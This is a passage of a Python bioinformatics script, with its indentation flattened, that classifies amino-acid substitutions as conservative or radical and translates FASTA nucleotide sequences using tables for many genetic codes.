"L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},7:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"R",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"C",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"R",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"C",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"C",("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"R",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"C",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"R",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"C",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}}
resultsList = []
cri = 0
for scheme in aaSchemeList:
currScheme = aaSchemeDict[scheme]
currValue = currScheme[(aaList[0],aaList[1])]
if currValue == 'R':
cri += 1
resultsList.append(1)
else:
resultsList.append(0)
cri = cri/7.0
resultsList.append(cri)
return resultsList
def buildCodonDict(fasta):
code = 'invertebrateMt'
geneticCodes = {'standard':{"TTT":"F", "TTC":"F", "TTA":"L", "TTG":"L", "TCT":"S", "TCC":"S", "TCA":"S", "TCG":"S", "TAT":"Y", "TAC":"Y", "TAA":"*", "TAG":"*", "TGT":"C", "TGC":"C", "TGA":"*", "TGG":"W", "CTT":"L", "CTC":"L", "CTA":"L", "CTG":"L", "CCT":"P", "CCC":"P", "CCA":"P", "CCG":"P", "CAT":"H", "CAC":"H", "CAA":"Q", "CAG":"Q", "CGT":"R", "CGC":"R", "CGA":"R", "CGG":"R", "ATT":"I", "ATC":"I", "ATA":"I", "ATG":"M", "ACT":"T", "ACC":"T", "ACA":"T", "ACG":"T", "AAT":"N", "AAC":"N", "AAA":"K", "AAG":"K", "AGT":"S", "AGC":"S", "AGA":"R", "AGG":"R", "GTT":"V", "GTC":"V", "GTA":"V", "GTG":"V", "GCT":"A", "GCC":"A", "GCA":"A", "GCG":"A", "GAT":"D", "GAC":"D", "GAA":"E", "GAG":"E", "GGT":"G", "GGC":"G", "GGA":"G", "GGG":"G"},'invertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'vertebrateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': '*', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': '*', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'yeastMt':{'CTT': 'T', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'T', 'CTA': 'T', 'CTC': 'T', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'coelenterateMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'ciliateNuc':{'CTT': 'L', 'TAG': 'Q', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Q', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'echinodermMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'euplotidNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'C', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'bacterial':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'yeastNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'S', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'ascidianMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'G', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'G', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'flatwormMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Y', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'chlorophyceanMt':{'CTT': 'L', 'TAG': 'L', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'trematodeMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'pterobranchiaMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'K', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}}
geneticCode = geneticCodes[code]
startCodons = ['ATT','ATC','ATA','ATG','GTG']
seqDict,seqList = buildSeqDict(fasta)
codonDict = {}
AADict = {}
for seq in seqList:
nucleotideSeq = seqDict[seq]
codonList = []
i = 2
while i < len(nucleotideSeq):
currCodon = nucleotideSeq[i-2] + nucleotideSeq[i-1] + nucleotideSeq[i]
codonList.append(currCodon)
i += 3
codonDict[seq] = codonList
AAseq = ''
codonNum = 1
for codon in codonList:
if codonNum == 1 and 'N' not in codon and '-' not in codon:
if codon in startCodons:
aa = 'M'
else:
aa = geneticCode[codon]
elif 'N' not in codon and '-' not in codon:
aa = geneticCode[codon]
else:
aa = 'X'
AAseq += aa
codonNum += 1
if AAseq[-1] == '*':
AAseq = AAseq[0:-1]
AADict[seq] = AAseq
return seqDict, seqList, codonDict
def buildSeqDict(fasta):
infile = open(fasta,'r')
scaffoldDict = {}
scaffoldList = []
seqName = ''
currSeq = ''
for line in infile:
if line[0] == '>':
if seqName != '':
scaffoldDict[seqName] = currSeq
seqName = line
while seqName[-1] == '\n' or seqName[-1] == '\t' or seqName[-1] == '\r':
seqName = seqName[0:-1]
scaffoldList.append(seqName)
currSeq = ''
else:
currSeq += line
